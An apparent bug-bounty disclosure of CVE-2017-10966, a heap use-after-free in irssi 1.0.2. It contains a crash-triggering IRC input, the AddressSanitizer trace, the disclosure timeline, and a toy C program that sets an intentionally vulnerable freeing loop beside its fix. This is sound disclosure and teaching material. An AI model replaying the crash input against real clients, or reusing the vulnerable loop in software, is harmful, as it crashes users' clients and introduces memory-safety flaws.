CVE-2017-10966: Heap-use-after-free in Irssi <1.0.4

High
Internet Bug Bounty
Reported by geeknik

Vulnerability Details

Technical details and impact analysis

Use After Free
35 days after reading https://irssi.org/2017/05/12/fuzzing-irssi/, I was able to trigger a heap-use-after-free in irssi 1.0.2.

Timeline:
Report to vendor: 16 June 2017
Acknowledged by vendor: 16 June 2017
Fixed by vendor: 7 July 2017
Advisory: http://seclists.org/oss-sec/2017/q3/80
Patch: https://github.com/irssi/irssi/commit/5e26325317c72a04c1610ad952974e206

```
./irssi < test001
CAP LS
NICK root
USER root root /dev/stdin :root
MODE +i
WHOIS root
WHO +00000000000000000000o00
==30112==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000008100 at pc 0x0000006d3a48 bp 0x7ffdd447b320 sp 0x7ffdd447b318
READ of size 8 at 0x607000008100 thread T0
    #0 0x6d3a47 in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:455:30
    #1 0x7f97420273bf in g_hash_table_foreach (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x393bf)
    #2 0x6d3786 in sig_channel_destroyed /root/irssi-1.0.2/src/core/nicklist.c:465:2
    #3 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #4 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #5 0x699ec1 in channel_destroy /root/irssi-1.0.2/src/core/channels.c:83:2
    #6 0x672ce0 in event_join /root/irssi-1.0.2/src/irc/core/channel-events.c:258:3
    #7 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #8 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #9 0x62cd3d in irc_server_event /root/irssi-1.0.2/src/irc/core/irc.c:308:7
    #10 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #11 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #12 0x62d33a in irc_parse_incoming_line /root/irssi-1.0.2/src/irc/core/irc.c:362:3
    #13 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #14 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #15 0x62d6ba in irc_parse_incoming /root/irssi-1.0.2/src/irc/core/irc.c:383:3
    #16 0x6bb9b2 in irssi_io_invoke /root/irssi-1.0.2/src/core/misc.c:55:3
    #17 0x7f9742038229 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a229)
    #18 0x7f97420385df (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a5df)
    #19 0x7f974203868b in g_main_context_iteration (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a68b)
    #20 0x57e4a7 in main /root/irssi-1.0.2/src/fe-text/irssi.c:326:3
    #21 0x7f97408273f0 in __libc_start_main /build/glibc-cxyGtm/glibc-2.24/csu/../csu/libc-start.c:291
    #22 0x42e979 in _start (/root/irssi-1.0.2/src/fe-text/irssi+0x42e979)

0x607000008100 is located 64 bytes inside of 72-byte region [0x6070000080c0,0x607000008108)
freed by thread T0 here:
    #0 0x4e4170 in __interceptor_cfree.localalias.1 (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4170)
    #1 0x6d39eb in nicklist_destroy /root/irssi-1.0.2/src/core/nicklist.c:112:2
    #2 0x6d39eb in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:456

previously allocated by thread T0 here:
    #0 0x4e4520 in calloc (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4520)
    #1 0x7f974203d9e0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f9e0)

SUMMARY: AddressSanitizer: heap-use-after-free /root/irssi-1.0.2/src/core/nicklist.c:455:30 in nicklist_remove_hash
```
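The trace is worth reading for its shape rather than its addresses: an 8-byte read at nicklist.c:455:30 lands 64 bytes into a freed 72-byte record, and the free happened one line later in the same function (line 456, via nicklist_destroy). That is the signature of a loop that walks a singly linked chain of records and advances by reading `->next` out of the record it has just destroyed, while g_hash_table_foreach (frame #1) is handing nicklist_remove_hash one chain per hash key. The C program below is an added illustration of that pattern and its fix; it is not irssi's code. The record layout (a 64-byte name followed by the `next` pointer, so the stale read falls at offset 64 of a 72-byte object on a 64-bit build), the names nick_destroy, remove_chain_vulnerable, remove_chain_fixed and build_chain, and the three-nick sample chain are all assumptions chosen to mirror the numbers in the trace.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy stand-in for irssi's NICK_REC (layout is an assumption, not irssi's
 * real struct): 64 bytes of name, then the pointer that chains records
 * sharing one hash key. On a 64-bit build sizeof == 72 and `next` sits at
 * offset 64, matching the freed region and read offset in the ASan report. */
typedef struct nick_rec {
	char name[64];
	struct nick_rec *next;
} NICK_REC;

static int destroyed_count;  /* records released by nick_destroy() */

/* Stand-in for nicklist_destroy(): unlinking is the caller's job; we scrub
 * the record so a stale read is visibly garbage, then free it. */
static void nick_destroy(NICK_REC *nick)
{
	destroyed_count++;
	memset(nick, 0xDD, sizeof(*nick));
	free(nick);
}

/* Vulnerable pattern. The loop increment reads nick->next after
 * nick_destroy() freed nick: under -fsanitize=address this reports a
 * heap-use-after-free with the same READ of size 8 at offset 64 as above;
 * a plain build follows a 0xDDDD... pointer and crashes. Only run on purpose. */
static void remove_chain_vulnerable(NICK_REC *nick)
{
	for (; nick != NULL; nick = nick->next)  /* UAF: nick already freed */
		nick_destroy(nick);
}

/* Fixed pattern: capture the successor before destroying the current
 * record. Returns the number of records destroyed. */
static int remove_chain_fixed(NICK_REC *nick)
{
	NICK_REC *next;
	int n = 0;

	while (nick != NULL) {
		next = nick->next;
		nick_destroy(nick);
		nick = next;
		n++;
	}
	return n;
}

/* Build a constructed sample chain nick0 -> nick1 -> ... -> nick(count-1). */
static NICK_REC *build_chain(int count)
{
	NICK_REC *head = NULL;
	int i;

	for (i = count - 1; i >= 0; i--) {
		NICK_REC *rec = calloc(1, sizeof(*rec));  /* calloc, like g_malloc0 in the trace */
		if (rec == NULL)
			abort();
		snprintf(rec->name, sizeof rec->name, "nick%d", i);
		rec->next = head;
		head = rec;
	}
	return head;
}

/* Offset of the field the stale read hits; exposed so it can be checked. */
static size_t next_offset(void)
{
	return offsetof(NICK_REC, next);
}

int main(int argc, char **argv)
{
	int n = remove_chain_fixed(build_chain(3));
	printf("fixed loop destroyed %d records; next at offset %zu of %zu bytes\n",
	       n, next_offset(), sizeof(NICK_REC));

	/* Build with: cc -g -fsanitize=address uaf.c -o uaf && ./uaf --crash */
	if (argc > 1 && strcmp(argv[1], "--crash") == 0)
		remove_chain_vulnerable(build_chain(3));
	return 0;
}
```

The vulnerable loop only runs when the program is started with --crash; compiling with -fsanitize=address then produces a report of the same shape as the one in this ticket, with the read in the loop increment and the free in the destroy call one line earlier, which is the quickest way to confirm a suspected iterate-while-freeing bug in any similar code.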

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

Use After Free